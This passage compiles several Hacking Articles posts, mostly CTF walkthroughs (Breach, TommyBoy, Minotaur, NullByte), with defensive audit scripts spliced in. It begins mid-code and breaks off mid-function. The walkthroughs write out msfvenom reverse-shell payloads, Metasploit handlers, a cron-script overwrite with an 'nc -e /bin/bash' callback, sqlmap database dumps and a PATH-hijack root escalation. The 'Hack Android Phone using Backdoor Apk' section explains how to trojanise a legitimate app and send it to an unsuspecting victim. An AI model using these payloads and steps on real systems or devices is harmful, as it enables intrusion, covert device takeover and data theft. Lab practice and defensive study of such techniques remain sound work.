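COMMENT_RE = re.compile(r"<!--(.*?)-->", re.S)


def looks_base64(text):
    """Cheap syntactic test: base64 alphabet only, length a multiple of 4."""
    text = text.strip()
    return len(text) >= 4 and len(text) % 4 == 0 and B64_RE.match(text) is not None


def is_printable_text(data):
    try:
        return all(ch in string.printable for ch in data.decode("ascii"))
    except UnicodeDecodeError:
        return False


def decode_layers(blob, max_layers=10):
    """Peel nested base64 until the result is no longer base64-shaped or no
    longer printable text. Returns (innermost text, layers removed).
    Heuristic: a plaintext that happens to be valid base64 of printable
    bytes would be peeled one layer too far, hence the cap and the count,
    so a caller can re-check the final step by hand."""
    current = blob.strip()
    layers = 0
    while layers < max_layers and looks_base64(current):
        try:
            decoded = base64.b64decode(current, validate=True)
        except (binascii.Error, ValueError):
            break
        if not is_printable_text(decoded):
            break
        current = decoded.decode("ascii").strip()
        layers += 1
    return current, layers


def encode_layers(text, layers):
    """Inverse helper, used here to build the sample and to reproduce a finding."""
    data = text.encode("ascii")
    for _ in range(layers):
        data = base64.b64encode(data)
    return data.decode("ascii")


def find_encoded_comments(html):
    """Every HTML comment whose body is base64-shaped, fully decoded.
    Returns a list of (decoded text, layers) in document order."""
    results = []
    for match in COMMENT_RE.finditer(html):
        body = match.group(1).strip()
        if looks_base64(body):
            results.append(decode_layers(body))
    return results


# Constructed page source for the demo; the credential is made up.
SAMPLE_HTML = ("<html><body><img src='logo.png'>\n<!-- "
               + encode_layers("user:pass", 2) + " -->\n</body></html>")

if __name__ == "__main__":
    print(find_encoded_comments(SAMPLE_HTML))
```

Double encoding, as on this VM, is reported as layers == 2; the decoded text is whatever the author hid, so treat the output as sensitive.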

Now go back to the home page and click on the image. It will redirect you to another page.

We tried to open every tab but found nothing except the Employee Portal tab. Clicking on the Employee Portal tab opens a login page. Log in with the username and password that you just decoded using HackBar.

Once you are logged in, you will see that there are three messages in the inbox. Open each message one by one, as we may find a clue in them.

In the first mail a user is simply sending a message to another user named peter. And as we found no clue in it we may move forward to the second mail.

Second mail is about IDS which confirms our suspicion about activated IDS.

Moving on to the third mail, you will find a URL mentioned and talk about an SSL certificate. So let's not wait any longer and open the URL first.

Opening the URL it will show a file to download. Download the file and save it.

Now let’s look for SSL in the search bar and see what it has to offer.

There is in fact an SSL certificate present. Open it.

In the SSL certificate you will find a URL.

Similarly, open the URL and it will ask you to download a file.

Once you have downloaded the file. Open it with wireshark

Now that the file is open, try to read it by right-clicking on a packet and selecting Follow >> TCP Stream. This is the normal way to read a capture, but as you can see the traffic is encrypted, and from earlier we know that the SSL certificate will let us read it.

The problem is that SSL decryption is not yet configured, so we have to find a way to set it up. Look at what Wireshark shows: most of the communication takes place on port 8443. This port is used by Tomcat, and the file we downloaded earlier, namely .keystore, may hold the certificates; we recall that the page where we downloaded it mentioned Tomcat, which confirms our intuition.

After a lot of research on the internet (Security Stack Exchange) we found how to convert the keystore's proprietary format (called "JKS") to the standardized PKCS12 format:

keytool -importkeystore -srckeystore keystore -destkeystore mykeystore.p12 -deststoretype PKCS12 -srcalias tomcat

For the passwords we used tomcat, as it is the usual default. Now the file is ready to import.

So, to enable decryption simply go to the Edit menu from the menu bar and select Preferences from the drop-down menu.

A dialog box will open, select protocols option and then select SSL and then click on Edit button.

Another dialog box will open. Here, give IP address of the target and port number 8443 along with the path of keystore file and the password.

Now we have activated SSL so right click on the file and choose the option Follow and then select SSL stream.

Finally, now you can read the file. In the file you will again find a base64 code. Decode it in the similar way using hack bar.

Decoding it with the Hackbar will give you the username and password as the result.

Traversing the capture in Wireshark some more will show you a URL, as shown:

Opening this URL on the browser will open a software foundation page made in java. On this page you can find a browse option which means we can upload a malicious file here.

So now let's generate a malicious file with msfvenom that is compatible with Java; for this type:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.128 LPORT=4444 -f war > /root/Desktop/update.war

Go to the browse option now and upload your file.

The file is uploaded.

Now before clicking on the file, open metasploit and type:

use exploit/multi/handler

set payload java/meterpreter/reverse_tcp

set lhost 192.168.110.128

set lport 4444

exploit

Click the file once you hit enter and you will have your meterpreter session in no time.

Now go to the shell and use a small python script to get a proper terminal; for that type:

shell

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

Once you reach the terminal type the following command to see the details:

ls -lsa

As we found nothing in it we went back by typing:

cd ..

Then go to home and into milton's directory and read the file which may have our flag. Do this with the following steps:

cd home

ls -lsa

cd milton

ls -lsa

cat some_script.sh

LOL! We were trolled, as there was no flag here. Since we found nothing we were back to square one, so we started searching everything again thoroughly. And then we found an image called bill.png.

We read it with exiftool by typing:

exiftool bill.png

We found a password here i.e. coffeestains

Then go to the passwd file :

cat /etc/passwd

Then su and give the password as coffeestains:

su blumbergh

And then look at the IDs by typing:

id

On further exploring you will find a file called /usr/share/cleanup/tidyup.sh. The file says that it runs every three minutes in order to defend itself from hackers. Since our user can write to it with root privileges (via sudo tee), we should be able to modify it, so type:

echo "nc -e /bin/bash 192.168.110.128 8443" > shell.txt

cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

cat /usr/share/cleanup/tidyup.sh

Now that the above commands have been executed, we need a listener to catch the shell and read our flag; for that type:

nc -lvv -p 8443
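Both the SkyDog sanitizer.py step earlier and this tidyup.sh step come down to the same weakness: a script that runs with root privileges can be rewritten by a less privileged user, either because the file itself is group- or world-writable or because a sudo rule hands out a binary (tee here) that writes arbitrary files. The following Python audit is an added example rather than anything from the Breach or SkyDog VMs: it parses a system crontab, resolves which file each job actually executes (skipping a leading interpreter such as python), and reports those writable by group or world; a second function flags sudoers entries granting write-capable binaries. The crontab, the permission table and the sudoers lines are constructed for the example; on a real host pass real_mode instead of the sample table.

```python
import os
import shlex
import stat

# Constructed system crontab modelled on the SkyDog and Breach walkthroughs;
# not the VMs' real /etc/crontab.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/3 * * * * root /usr/share/cleanup/tidyup.sh
* * * * *   root python /lib/log/sanitizer.py
0 2 * * *   root /backup/backup.sh
"""

# Constructed permission table standing in for os.stat() on the target.
SAMPLE_MODES = {
    "/usr/share/cleanup/tidyup.sh": 0o755,
    "/lib/log/sanitizer.py": 0o777,
    "/backup/backup.sh": 0o700,
}

# Constructed sudoers lines (not the Breach VM's real file).
SAMPLE_SUDOERS = """\
Defaults env_reset
root      ALL=(ALL:ALL) ALL
%sudo     ALL=(ALL:ALL) ALL
blumbergh ALL=(ALL) NOPASSWD: /usr/bin/tee
"""

INTERPRETERS = {"sh", "bash", "python", "python2", "python3", "perl", "ruby"}
# Binaries that write arbitrary files when run via sudo (tee is the one above).
WRITE_CAPABLE = {"tee", "cp", "dd", "mv", "vi", "vim", "nano"}


def parse_system_crontab(text):
    """(user, argv) for each job in /etc/crontab format: five time fields,
    a user, then the command. @reboot-style shortcuts are not handled."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 6)
        if len(fields) == 7:
            jobs.append((fields[5], shlex.split(fields[6])))
    return jobs


def executed_file(argv):
    """The file a job really runs: skip a leading interpreter name."""
    if not argv:
        return None
    if os.path.basename(argv[0]) in INTERPRETERS and len(argv) > 1:
        return argv[1]
    return argv[0]


def writable_by_others(mode):
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def real_mode(path):
    """Permission bits of a real file, or None if it does not exist."""
    try:
        return stat.S_IMODE(os.stat(path).st_mode)
    except OSError:
        return None


def audit_cron(crontab_text, mode_lookup=real_mode):
    """[(user, path, mode)] for jobs whose executed file is group- or
    world-writable: anyone who can write it runs code as that user."""
    findings = []
    for user, argv in parse_system_crontab(crontab_text):
        path = executed_file(argv)
        mode = mode_lookup(path) if path else None
        if mode is not None and writable_by_others(mode):
            findings.append((user, path, oct(mode)))
    return findings


def risky_sudo_rules(sudoers_text):
    """[(user, command)] for rules granting a write-capable binary."""
    findings = []
    for line in sudoers_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        user, _, spec = line.partition(" ")
        for cmd in spec.rsplit(":", 1)[-1].split(","):
            cmd = cmd.strip()
            if cmd and os.path.basename(cmd.split()[0]) in WRITE_CAPABLE:
                findings.append((user, cmd))
    return findings


if __name__ == "__main__":
    print(audit_cron(SAMPLE_CRONTAB, SAMPLE_MODES.get))
    print(risky_sudo_rules(SAMPLE_SUDOERS))
```

The first finding is the SkyDog case (a root job whose script anyone can edit); the second is the Breach case (a rule that lets a user write any root-owned file). Fixing either is a matter of ownership and mode on the script, and of sudo rules that name only binaries which cannot write outside their arguments.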

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post Hack the Breach 1.0 VM (CTF Challenge) appeared first on Hacking Articles.

Hack the TommyBoy VM (CTF Challenge)


Tommy Boy VM is a CTF based on the movie Tommy Boy and the fictitious company “Callahan Auto” in the movie. This CTF, Tommy Boy, has been created by Brian Johnson of 7 Minute Security. It is a really fun VM — a few bits of it were fairly easy, some parts of it were really tricky, and there are some pretty neat little tricks in there too.

WalkThrough

Start off by scanning the network to find our target. As we all know, the command for it is:

netdiscover

We found our target –> 192.168.0.102

Our next step is to scan our target with nmap. We will use an aggressive scan (-A), which combines service/version detection, OS detection and the default scripts in one pass.

nmap -A 192.168.0.102

The result shows us that 3 ports are open: 22 (ssh), 80 (http), 8008 (http).

Moving on we will use nikto to have detailed information of our target. So for this, type :

nikto -h 192.168.0.102

Using nikto we found a robots.txt file which might contain some information. We opened it in our browser, and yes, we found our first flag.

Opening the first flag, we found out that there are a total of five flags whose combination will open the treasure in our scavenger hunt. The first flag is part one of five of a password.

To further explore and find the rest of the flags we browsed to port 80 and were greeted with the Callahan Auto page, which apparently was experiencing some technical difficulties.

As we were stuck there, we thought about using the curl command. It provides a library and command-line tool for transferring data using various protocols and shows a lot of detail that can be used on various occasions. To use curl type:

curl http://192.168.0.102

Executing the curl command we found a youtube link. No harm in opening it so let us do that.

From the YouTube link we learn that it has something to do with a prehistoric forest. So we tried it in the browser as 192.168.0.102/prehistoricforest/

And to our luck we found a lot of information. The first piece was that the website was made in WordPress.

Knowing the website was made in WordPress automatically had us use WPScan. To use it, open a terminal in Kali and type:

wpscan --url http://192.168.0.102/prehistoricforest --enumerate u

WPScan proved useful: we found that there are four users. This information came in handy later.

Further investigating the same “prehistoricforest” page we found other important things like the text file which contained our second flag.

As we opened the text file we had our second flag. Two down, three more to go.

As we found another important clue on the same web page of prehistoric forest we decided to investigate further. And this decision proved right as we found another clue which stated to use /richard instead of /prehistoricforest.

And we did as stated above and we stumbled upon an image.

This image, as it is, gave us no clue. So we decided to read its EXIF data. There was no need for third-party software, as EXIF readers are available online. Click on the browse option to supply the image.

Investigating the image we find an MD5 hash value.

Go to www.md5cracker.org and crack the md5 code we just discovered. On cracking it we will find that it makes up the word spanky.

Now this word spanky could be our password, so open the URL 192.168.0.102/prehistoricforest/ and open one of the comments; it will ask you for a password. Give the password as spanky.

It will open a page with some hints. Reading it, there are only two things to remember:

  • There is something about nickburns
  • There is an FTP port open.

Now, we scanned before and did not find an FTP port anywhere. So let us scan every port. For that type:

nmap -p 1-65535 192.168.0.102

The scan shows that port 65534 is open. This might be the port the FTP service has been moved to. So, now connect to this port using WinSCP.

Open the WinSCP software, give the target's IP and the port number along with the username: nickburns and password: spanky

Import the file readme.txt .

Opening the file you will come across the following :

In the file you will see that he is talking about a subfolder "NickizL33t".

Furthermore, we will find the following page :

Now if you pay attention it says "only me and Steve Jobs are allowed to look at this stuff", which means the page is meant to be read from an iPhone. Not everyone has an iPhone, but there is a substitute.

There is a Firefox Add-on named "User Agent Switcher" which will let you read the said file.

Once you have added this Add-on, go to the Tools menu. From the drop-down menu select Default User Agent and then the iPhone 3.0 option.

After doing the said, the page will appear somewhat like the following :

Now he is talking about some .html file. As we have already checked everywhere and didn’t find such file. It’s a possibility that this file was hidden so let’s use DIRBuster to find it.

Open DirBuster, give target’s IP and the path of dictionary file named rockyou.txt

Also, select iphone in Http User Agent

It will show you that there is a hidden file fallon1.html. Upon opening it you will have:

  • A hint
  • Third flag
  • Big Tom’s encrypted pw backups

In hint.txt you will find hints all about the passwords.

And of course in the flag file you will find the third flag i.e. third part of the password with five parts.

Third file will be the one which you will download.

We got all the hints about password we needed. Therefore, we will generate a dictionary file using crunch and for this type :

crunch 13 13 -t bev,%%@@1995 -o /root/Desktop/dict.txt

And then we will crack the password of the zip file we just downloaded using fcrackzip and so type :

fcrackzip -u -D -p /root/Desktop/dict.txt /root/Desktop/t0msp4ssw0rdz.zip
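The crunch pattern shows how much a few leaked password hints shrink the search space. As an added example, not from the original post or from crunch itself, the Python below reproduces crunch's -t placeholder expansion (@ lowercase, , uppercase, % digit, ^ symbol; the symbol set is an approximation of crunch's default) to compute the keyspace of a pattern and to generate candidates lazily. Note that crunch requires the min and max length arguments to equal the pattern length: as printed here the pattern has 12 characters, so either a character was lost or the lengths should be 12 12.

```python
import itertools
import string

# crunch -t placeholders (crunch man page): @ lowercase, , uppercase,
# % digit, ^ symbol. The symbol set below approximates crunch's default.
PLACEHOLDERS = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/",
}


def slots(pattern):
    """One candidate string per position: literals stay fixed, placeholders
    expand to their class. Literal digits such as '1995' are not
    placeholders, so each contributes a single choice."""
    return [PLACEHOLDERS.get(ch, ch) for ch in pattern]


def keyspace(pattern):
    """Number of candidates the pattern covers."""
    total = 1
    for choices in slots(pattern):
        total *= len(choices)
    return total


def generate(pattern):
    """Lazily yield every candidate, last position varying fastest
    (the same order crunch writes them)."""
    for combo in itertools.product(*slots(pattern)):
        yield "".join(combo)


def seconds_to_exhaust(pattern, guesses_per_second):
    """Worst-case time to try the whole keyspace at a given guess rate."""
    return keyspace(pattern) / guesses_per_second


if __name__ == "__main__":
    pat = "bev,%%@@1995"     # the hint-derived pattern from the walkthrough
    print(pat, keyspace(pat), "candidates")
    print("first candidate:", next(generate(pat)))
    print("hours at 1000 guesses/s:", seconds_to_exhaust(pat, 1000) / 3600)
```

With only five free positions the pattern leaves about 1.76 million candidates, which an offline zip cracker finishes in minutes; the same calculation for eight unconstrained lowercase letters gives 26 to the power 8, which is why password hints of this kind matter.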

Opening the zip file we have the usernames and passwords, all except one.

Now to get the password for the fourth user we will use wpscan:

ruby ./scan.rb --url https://192.168.0.102/prehistoricforest --wordlist /usr/share/wordlists/rockyou.txt --username tom

After about 3 to 4 hours you will have the password i.e. tomtom1

Now we logged in to the admin page but we did not find anything here except for the fact that there is something on SSH port.

So now, we will try to log in with SSH port.

ssh bigtommysenior@192.168.0.102

To see the list of files and folders type :

ls -lsa

As you can see we have found flag four, i.e. part four of five of the password. Read the flag:

cat el-flag-numero-quatro.txt

Besides the flag we have also found a backup file. Copy it so that we can open the home page properly in the browser:

cp callanhanbak.bak /var/www/html/index.html

Now open it in the browser.

Look up into the page source :

Here you will find a note directing you towards a folder. Let's see what it has:

It is the page where you can upload the file. So create the code via msfvenom :

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw

Copy the code from <?php till die(); and save it to a .php file. If the page does not accept your PHP file, change its extension to PNG, JPG or GIF to upload it. Once the file is uploaded, start multi/handler before running it by going to metasploit and typing:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lport 4444

set lhost 192.168.0.106

exploit

Then, as you run your uploaded file, you will have your meterpreter session. Type shell to reach the shell of the VM.

Now to read the fifth flag the last part of the password type :

cat /.5.txt

And voila!! You have captured all of the five flags that make up to a password which will open the zip file.

So, now unzip the zip file :

unzip LOOT.zip

Once the file is unzipped it will contain the last part of the challenge, i.e. a text file. Let's read it and finish this whole thing up:

cat THE-END.txt

HURRAYYY!!! We have Captured all the flags; hence completing the challenge.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post Hack the TommyBoy VM (CTF Challenge) appeared first on Hacking Articles.


Hack the Minotaur VM (CTF Challenge)


Minotaur is a Boot2Root CTF challenge which helps us improve our skills, especially password cracking. The VM will assign itself a specific IP address (in the 192.168.56.0/24 range). Do not change this, as the CTF will not work properly without an IP address in that range. A few things to keep in mind:

  • One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.
  • This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.

You can download this VM from –> https://www.vulnhub.com/entry/sectalks-bne0x00-minotaur,139/

WalkThrough

We will start off with nmap because we already know our target IP.

nmap -p- -A 192.168.56.223

As a result of nmap we can see that the port numbers: 22, 80, 2020 are open. We can use port 22 and 80 to our advantage.

Now we tried to explore through nikto and curl but unfortunately we found nothing of use. So we decided to use dirbuster.

Go to the terminal of kali and type :

dirbuster

It will open the dirbuster. In it, give the url in the Target URL box and select directory-list-2.3-medium.txt file in the File with list of dir box.

It will show you the directory called /bull/

Open the said directory in your browser.

It will show that there is a blog made in WordPress. As the blog is in WordPress we can apply WPScan to find usernames and vulnerable themes and plug-ins. To apply WPScan type:

wpscan -u http://192.168.56.223/bull/ --enumerate u

The command will start executing and show you all the exploitable plug-ins along with the usernames.

As you can see there is only one user, with the username bully. Also, there is a plug-in exploit for Slideshow Gallery, but it requires a username and password to work. We already have the username; all we need is its password, and we have no dictionary or password file for it. Therefore we will make a password file using CeWL.

CeWL is a ruby app which traverses a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password cracking. To make a password file from CeWL go to your terminal of your kali and type:

cewl http://192.168.56.223/bull -m 3 -w /root/Desktop/pass.txt

This will create a .txt with list of all the words that have a possibility to be the password for the username bully.

Now, to find out which word is the password, we will use Burp Suite. Apply a dictionary attack using Burp Suite; the moment it finds the correct password the value of Length changes, as shown below:

Now that we know username and password we can use that exploit for the plug-in. And to do so open metasploit and type:

use exploit/unix/webapp/wp_slideshowgallery_upload

set rhost 192.168.56.223

set rport 80

set targeturi /bull/

set wp_user bully

set wp_password Bighornedbulls

exploit

As the exploit runs it will give you a meterpreter session. Furthermore type:

shell

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

Execution of the above commands will take you to the terminal of your target. Then moving forward enter the /var/www/html folder and type :

ls -lsa

We found a flag here, let’s read it.

cat flag.txt

Then we went into the /tmp folder and read the flag there:

cd /tmp

ls -lsa

cat flag.txt

Now we found two flags but they were not the main flags and also we got a hint that shadow.bak file could be useful to us. Let’s have look in it.

cat shadow.bak

We will take help of John password cracker to find the passwords:

john shadow.bak

We found the passwords for both heffer and minotaur. Please recall that port number 22 i.e. for ssh was open and we can use it to log in and for this type:

ssh heffer@192.168.56.223

Give the password when asked and further check its directories:

ls -lsa

We found a flag here. Read it.

cat flag.txt

Now in the flag we found another flag along with a hint indicating that the flag is Minotaur. Now we will log in through SSH using minotaur:

ssh minotaur@192.168.56.223

Give the password when asked. And then check for directories:

ls -lsa

There is another flag available. Again read it.

cat flag.txt

Now, we have finally found the first flag along with another hint that is the final flag is in /root/flag.txt

Moving on, type the following to gain admin access and switch user :

sudo su

cd ..

cd ..

This will take you into the home folder. Here, type :

cd root

ls -lsa

Finally we have found the last flag.

cat flag.txt

WOOHOO!!! The flag is captured. Congrats and enjoy!!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post Hack the Minotaur VM (CTF Challenge) appeared first on Hacking Articles.

Brute Force Website Login Page using Burpsuite (Beginner Guide)


In this article we will learn to perform a dictionary attack with Burp Suite. We will try to crack the password of the DVWA lab.

Burp Suite: Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun. Importantly, it gives us another way to manage our attacks as the alternative to metasploit.

To make Burp Suite work, firstly, we have to turn on manual proxy and for that go to the settings and choose Preferences.

Then select advanced option and further go to Network then select Settings.

Now, select Manual proxy Configuration

And this way your manual proxy will be active as you can see below too.

Now, on the other hand open DVWA and log into it using its default username and password.

Once you log in, click on Brute Force. And also make sure that security is low or medium.

When you click on brute force, it will ask you the username and password. Here, before giving username and password open burp suite and select Proxy tab and turn on interception by clicking on Interception is on/off tab.

As you turn on the interception, then give any password you like just so that the burp suite can capture it.

Send the captured material to the intruder by right clicking on the space and choosing Send to Intruder option or simply press ctrl + i

Now open the Intruder tab then select Positions tab and following will be visible:

Choose the Attack type as Cluster Bomb.

Now select username and password as shown below:

In the above image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

So now, go to Payloads tab and the select 1 from Payload set (this ‘1’ denotes the username file). Then click on Load button and browse and select your dictionary file for username.

Now select 2 in the Payload set and again similar give the dictionary file for the password.

Now all you have to do is go to Intruder menu and select Start attack from the drop down menu.

Sit back and relax because now the burp suite will do its work and match the username and password and will give you the correct password and username. The moment it will find the correct value, it will change the value of length as shown:

And to confirm it from the response as it will be “Welcome to the password protected area admin”

And this way its all done.
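The length change Burp shows is exactly the signal a defender can watch for on the server side. The following Python is an added example, not part of the original article: it parses constructed Apache-style access-log lines for the DVWA brute-force page, raises an alert when one source IP sends five or more login requests within a 60-second window, and reports response-size outliers among that source's login requests (the successful attempt returns a different page length, just as in Burp's results table). Log lines, IP addresses and thresholds are all constructed for the example.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

# Constructed Apache access-log lines for the DVWA brute-force page.
# Not real traffic from the article; one line per Intruder payload.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2017:10:00:01 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=123456&Login=Login HTTP/1.1" 200 4712
10.0.0.5 - - [12/Jan/2017:10:00:01 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=letmein&Login=Login HTTP/1.1" 200 4712
10.0.0.5 - - [12/Jan/2017:10:00:02 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=qwerty&Login=Login HTTP/1.1" 200 4712
10.0.0.5 - - [12/Jan/2017:10:00:02 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=monkey&Login=Login HTTP/1.1" 200 4712
10.0.0.5 - - [12/Jan/2017:10:00:03 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=password&Login=Login HTTP/1.1" 200 4789
10.0.0.9 - - [12/Jan/2017:10:00:05 +0000] "GET /dvwa/index.php HTTP/1.1" 200 1503
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)(?:\s.*)?$'
)
LOGIN_PATH = "/dvwa/vulnerabilities/brute/"   # the endpoint being attacked


def parse_line(line):
    """One common/combined-log line to a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "path": m.group("path"),
        "status": int(m.group("status")),
        "size": None if m.group("size") == "-" else int(m.group("size")),
    }


def login_events(log_text):
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and ev["path"].startswith(LOGIN_PATH):
            yield ev


def detect_bursts(log_text, threshold=5, window=timedelta(seconds=60)):
    """{ip: peak count} for sources that hit the login page at least
    `threshold` times inside any `window` (sliding window per IP)."""
    recent = defaultdict(deque)
    alerts = {}
    for ev in login_events(log_text):
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        while q and ev["ts"] - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            alerts[ev["ip"]] = max(alerts.get(ev["ip"], 0), len(q))
    return alerts


def size_outliers(log_text):
    """Within each source's login requests, the responses whose length
    differs from that source's most common length: the same 'length
    changed' signal Burp surfaces, and a hint that one guess succeeded."""
    sizes = defaultdict(list)
    for ev in login_events(log_text):
        if ev["size"] is not None:
            sizes[ev["ip"]].append(ev["size"])
    outliers = []
    for ip, seen in sizes.items():
        if len(seen) < 2:
            continue
        common = Counter(seen).most_common(1)[0][0]
        outliers.extend((ip, s) for s in seen if s != common)
    return outliers


if __name__ == "__main__":
    print(detect_bursts(SAMPLE_LOG))
    print(size_outliers(SAMPLE_LOG))
```

On DVWA's low security level every attempt returns HTTP 200, so status codes alone say nothing; request rate per source and the response-size change are what give the attack away, and they are also the inputs a lockout or rate-limiting rule should key on.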

Shivam Gupta is an Ethical Hacker, Cyber Security Expert and Penetration Tester from India.

The post Brute Force Website Login Page using Burpsuite (Beginner Guide) appeared first on Hacking Articles.

Hack Android Phone using Backdoor Apk


Sometimes in hacking we have to use the most genuine-looking way so that the victim is surely compromised. One of the most convincing ways to hack an Android phone is to bind an original Android app to your backdoor. backdoor-apk is software which helps us bind an original apk file with your payload, hence taking all suspicion away from you.

And for this first you have to execute the following command:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1


Once the command has executed and installation is done, download backdoor-apk from GitHub; for that type:

git clone https://github.com/dana-at-cp/backdoor-apk.git


As the software is downloaded, go to the www.apk4fun.com website and download an original apk file like I downloaded ccleaner. And then copy it in the backdoor-apk folder.

Open it in the terminal and type:

./backdoor-apk.sh ccleaner.apk

As the command runs it will ask you for the payload you want to use and for that select 3 and then it will ask you for lhost and lport and give these respectively.


The above commands will bind the file to the original apk file and will save it to backdoor-apk>original>dist folder.

Now all you have to do is send the file to the victim; when they open it, the installer prompts them to click Next.

Then they click Install to install the app.

This completes the installation of the app.

Before the app is opened, start Metasploit and type:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.1.126

set lport 4444

exploit

After this, when the victim runs the app, you get a Meterpreter session.

And the victim is compromised without suspecting a thing.

The post Hack Android Phone using Backdoor Apk appeared first on Hacking Articles.

Hack the NullByte VM (CTF Challenge)

This is our article on the NullByte root2boot penetration testing challenge. We will walk through exploiting the NullByte VM. Breaking into it isn't too difficult: there is no advanced exploitation or reverse engineering, and the level is considered beginner-intermediate. The goal is to find “Proof.txt” by following the steps below.

WalkThrough

Start off by finding your target on the network:

netdiscover

Our target is 192.168.1.142. Now that we know the target, we scan it with nmap:

nmap -p- -A 192.168.1.142

The scan shows that ports 80, 111, 777 and 44607 are open. Note that SSH is running on port 777 rather than the default 22; this port will come in handy later for gaining access.

Next, open the target IP in a browser.

The page shows an image and a quote. There is nothing useful in the page source or elsewhere, but something may be hidden in the image's metadata, so we read it with exiftool:

exiftool main.gif

The metadata contains a comment, kzMb5nVYJw. This might be a directory name, and there is no harm in opening it in the browser, so let's do that.

Our assumption was right: the page opens, but it asks for a key. We have no idea what the key is, so we run a dictionary attack against it using Burp Suite and rockyou.txt.

The dictionary attack finds the key: elite.

Enter the key where it is asked for and the following page opens.

It now asks for a username, which again we do not know, so we will look for it in the database using sqlmap. For this, type:

sqlmap -u http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch=1 --dbs

This gives the name of the database: seth. Next we enumerate its tables and columns and dump their contents:

sqlmap -u http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch=1 --dump --columns --tables -D seth

Once the command finishes, it shows the table name along with its columns, including the username and the password, as shown:

As a result we have a username and a password, but the password is an MD5 hash, so we need to crack it; there are many online tools for this. Go to md5coder.org, paste the MD5 value, click OK, and it shows the original word: omega.

Now we log in over SSH on port 777:

ssh ramses@192.168.1.142 -p 777

Enter omega as the password and you are logged in. Now list the contents of the home directory:

ls -lsa

Then read the .bash_history file:

cat .bash_history

Since there is nothing useful there, we move on to /var/www/backup, list it and run the procwatch binary found there:

cd /var/www/backup/

ls -lsa

./procwatch

After much more exploring and a number of fruitless attempts, we had an idea: procwatch runs ps, and if we can make it run a shell named ps instead, we reach root directly. To achieve this we manipulate the environment: copy the shell executable (/bin/sh) into /tmp under the name ps, put /tmp first in PATH, and run procwatch again. Follow the steps below:

cd /tmp

cp /bin/sh /tmp/ps

export PATH=/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

cd /var/www/backup

./procwatch

After running the above commands we have a root shell. Then type:

id

cd /root

ls

cat proof.txt
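The trick above works because procwatch runs ps by bare name, so whoever controls PATH chooses which ps executes. The following added example (not part of the write-up) simulates that lookup against a constructed in-memory filesystem and adds the defender's check, audit_path(), which lists user-writable, empty or relative PATH entries searched before the system directories; the hardening is to invoke /bin/ps by absolute path (or reset PATH) in any privileged program. The filesystem contents, the writable-directory list and the assumption that procwatch is a root-privileged binary are all hypothetical.

```python
"""PATH lookup simulation and audit for the procwatch trick above.

Added example, not part of the write-up. resolve() mimics execvp()'s
PATH search against a constructed filesystem; audit_path() reports the
PATH entries a local user could plant a binary in.
"""
import posixpath

# Constructed filesystem: directory -> set of executable names in it.
FS = {
    "/bin": {"sh", "ps"},
    "/usr/bin": {"id", "cat"},
    "/tmp": {"ps"},  # the planted copy of /bin/sh named ps
}
# Directories an unprivileged user can normally write to (assumption).
USER_WRITABLE = {"/tmp", "/var/tmp", "/dev/shm", "/home/ramses"}
SYSTEM_DIRS = ("/bin", "/usr/bin", "/sbin", "/usr/sbin")

def resolve(cmd, path):
    """Return the path execvp() would run for cmd, or None if not found."""
    if "/" in cmd:
        return cmd  # explicit path: PATH is never consulted
    for d in path.split(":"):
        if cmd in FS.get(d or ".", set()):
            return posixpath.join(d, cmd)
    return None

def audit_path(path):
    """Entries a local user could plant a binary in that are searched
    before the first system directory (later entries cannot shadow ps)."""
    bad = []
    for d in path.split(":"):
        if d in SYSTEM_DIRS:
            break
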